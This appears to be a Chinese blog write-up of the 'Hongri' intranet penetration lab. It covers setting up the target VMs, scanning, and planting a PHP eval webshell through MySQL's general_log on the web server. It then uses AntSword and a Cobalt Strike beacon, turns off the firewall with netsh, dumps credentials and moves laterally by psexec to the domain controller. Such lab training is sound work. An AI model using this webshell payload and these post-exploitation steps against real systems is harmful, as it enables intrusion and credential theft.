内网渗透---红日靶场1

一、环境搭建

官方下载地址及相关信息:​​​漏洞详情

下载后有三台虚拟机,默认密码为:hongrisec@2019

  • win7增加一张网卡,一张外网为NAT,另一张内网为VMnet1(仅主机模式)
  • Windows server2008和win2K3的配置都是VMnet1: 
  •  
  • 配置好即可登录,登录时提示密码过期需更改密码--->win7需打开phpstudy(外网服务器)
  • 主机可以搜索到win7phpstudy探针
  •  各机ip如下:

win7         IP:192.168.50.210(外网)
                        192.168.52.143(内)

win2008           192.168.52.138(内)

win2003           192.168.52.141(内)

kali                   192.168.50.218(攻击机)

 靶场环境搭建完毕。

二、WEB渗透

 1、信息收集

  • 通过nmap扫描,可以发现开放了80端口和3306端口
nmap -A -p- 192.168.50.210

  • 通过dirsearch扫描目录,发现有phpmyadmin,爆破后帐号/密码为:root/root
dirsearch -u http://192.168.50.210/

 2、木马植入

  •  通过简单查询,获得到网站的绝对路径   
  •              
  •  尝试木马植入,但未果。
  • 通过查询得知,secure_file_priv的值为NULL,说明不能使用into outfile的方式写入shell。
  •  尝试日志写入shell,查看日志状态,默认为关闭状态:
  • 开启日志,并将MYSQL的通用查询日志的输出文件设置为指定的路径:

SET GLOBAL general_log = 'ON'
SET GLOBAL general_log_file = 'C:/phpstudy/www/1.php'

 

  •  写入一句话木马:SELECT '<?php @eval($_POST["cmd"]);?>'                                       
  • 植入成功
  • 使用蚁剑链接刚刚上传的木马目录
  • 上线成功3

3、使用蚁剑+CS

  • kali打开服务端,CS链接
  • 创建监听器​​​​​​
  •  创建Windows可执行exe程序,有效载荷-->win可执行程序-->监听器选择刚刚创建的web--->将后门保存到桌面--->利用蚁剑上传到phpstudy/www目录下

 

  •  在蚁剑终端运行:stat web.exe--->上线成功

三、内网渗透

1、提权:administrator-->system

  •  顺便改一下回连间隔,改为5
  •  上线后关闭防火墙
shell netsh advfirewall set allprofiles state off

2、内网信息收集

  •  查看网络适配器 shell ipconfig
  •  查看本地用户 shell net user
  •  查看计算机名 shell net view
  • 查看有几个域 shell net view /domain 
  •  抓取明文密码:右击system--->凭证提权--->抓取明文密码

 3、内网横向

kali端口扫描的时候发现开放了445端口,可以在CS上创建SMB监听隧道。

SMB(全称是Server Message Block)是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。

  •  建立SMB监听器
  •  切换攻击目标列表--->右击--->横向移动--->psexec

成功进入域控 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值